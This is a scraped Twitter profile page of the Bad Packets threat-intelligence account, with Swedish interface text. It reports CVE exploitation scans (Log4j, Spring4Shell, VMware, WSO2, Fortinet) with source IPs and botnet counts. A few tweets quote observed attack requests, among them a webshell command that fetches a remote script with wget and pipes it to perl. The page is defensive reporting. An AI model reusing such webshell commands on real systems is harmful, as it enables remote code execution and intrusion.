Bad PacketsVerifierat konto

@bad_packets

Tweets by Troy Mursch. We provide cyber on emerging threats, DDoS botnets, and network abuse. References:

Gått med april 2017

Tweets

Du blockerade @bad_packets

Är du säker på att du vill visa dessa Tweets? Visning av Tweets kommer inte att häva blockeringen av @bad_packets

  1. Fastnålad Tweet
    10 dec. 2021

    Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (). Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs.

    Visa denna tråd
    Ångra
  2. ⚠️ CVE-2022-29464 event detected ⚠️ Source IP: 179.43.156.214 (🇨🇭) Target: WSO2 API Manager and Identity Server endpoints vulnerable to unrestricted arbitrary file upload leading to remote code execution. Vendor advisory:

    Ångra
  3. 27 apr.

    ⚠️ CVE-2022-22954 event detected ⚠️ Source IP: 212.193.30.228 (🇳🇱) Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution ().

    Ångra
  4. 25 apr.

    Top 10 Countries – Apr. 24, 2022 Active unique DDoS botnet hosts detected: 🇨🇳 China: 1,018 🇺🇸 United States: 535 🇰🇷 South Korea: 438 🇹🇼 Taiwan: 372 🇧🇷 Brazil: 274 🇷🇺 Russia: 219 🇮🇳 India: 192 🇲🇽 Mexico: 143 🇮🇹 Italy: 115 🇯🇵 Japan: 105

    Ångra
  5. 23 apr.

    ⚠️ CVE-2022-29464 event detected ⚠️ Source IP: 37.19.221.142 (🇺🇸) Target: WSO2 API Manager and Identity Server endpoints vulnerable to unrestricted arbitrary file upload leading to remote code execution. Vendor advisory:

    Ångra
  6. 20 apr.

    Mass scanning activity detected from 45.134.144.140 (🇳🇱) targeting Fortinet VPN servers vulnerable to unauthenticated arbitrary file read (CVE-2018-13379) leading to disclosure of usernames and passwords in plaintext. First seen: 2022-02-26 Last seen: 2022-04-20

    Ångra
  7. 15 apr.

    "GitHub is currently working to identify and notify all of the known-affected victim users and organizations."

    Ångra
  8. 14 apr.

    ⚠️ CVE-2022-22954 event detected ⚠️ Source IP: 185.244.153.13 (🇮🇶) Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution. Vendor advisory:

    Ångra
  9. Retweetade
    13 apr.
    Visa denna tråd
    Ångra
  10. 13 apr.

    ⚠️ CVE-2022-22954 event detected ⚠️ Source IP: 178.176.202.121 (🇷🇺) Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution ().

    Ångra
  11. 13 apr.

    We're also seeing CVE-2022-22954 activity from 60.166.67.164 (🇨🇳) – tags available now.

    Ångra
  12. 12 apr.

    ⚠️ CVE-2022-22954 event detected ⚠️ Source IP: 117.89.211.135 (🇨🇳) Target: VMware Workspace ONE Access (VMware Identity Manager) servers vulnerable to remote code execution Vendor advisory:

    Ångra
  13. 9 apr.

    ⚠️ CVE-2022-22965 event detected ⚠️ Source IP: 120.230.0.66 (🇨🇳) Paths targeted: / /add /download /index /login /uploadFile

    Ångra
  14. 6 apr.

    CVE-2022-22965 event detected from 185.244.152.15 (🇮🇶) with follow-up GET request for "/1877team.jsp?pwd=j&cmd=whoami"

    Ångra
  15. 5 apr.

    CVE-2022-22965 event detected from 45.12.2.252 (🇺🇦) with follow-up GET request for "/checkexploit.jsp"

    Visa denna tråd
    Ångra
  16. 2 apr.

    CVE-2022-22965 event detected from 144.16.111.28 (🇮🇳) with follow-up GET request for "/shell.jsp?pwd=k3rwin&cmd=wget -q -O - 89.44.9.246/i|perl"

    Visa denna tråd
    Ångra
  17. 2 apr.

    CVE-2022-22963 event detected from 45.33.65.249 (🇺🇸) – "touch /tmp/test.txt"

    Visa denna tråd
    Ångra
  18. 1 apr.

    CVE-2022-22965 event detected from 192.3.145.46 (🇺🇸) with follow-up GET request for "alala.txt"

    Visa denna tråd
    Ångra
  19. 31 mars

    Spring Cloud Function RCE (CVE-2022-22963) mass scanning activity detected from 45.155.204.146 (🇷🇺). Spring Framework RCE (CVE-2022-22965) mass scanning activity detected from multiple Tor exit nodes. Tags available now for both vulnerabilities.

    Visa denna tråd
    Ångra
  20. 30 mars
    Ångra
  21. 25 mars

    ⚠️ CVE-2021-26084 event detected ⚠️ Source IP: 109.237.96.124 (🇷🇺) Target: Atlassian Confluence servers vulnerable to unauthenticated remote code execution ().

    Ångra

Hämtningen verkar ta ett tag

Twitter kan vara överbelastat eller ha tillfälliga problem. Försök igen eller besök Twitter Status om du vill ha mer information.

    Du kanske också gillar

    ·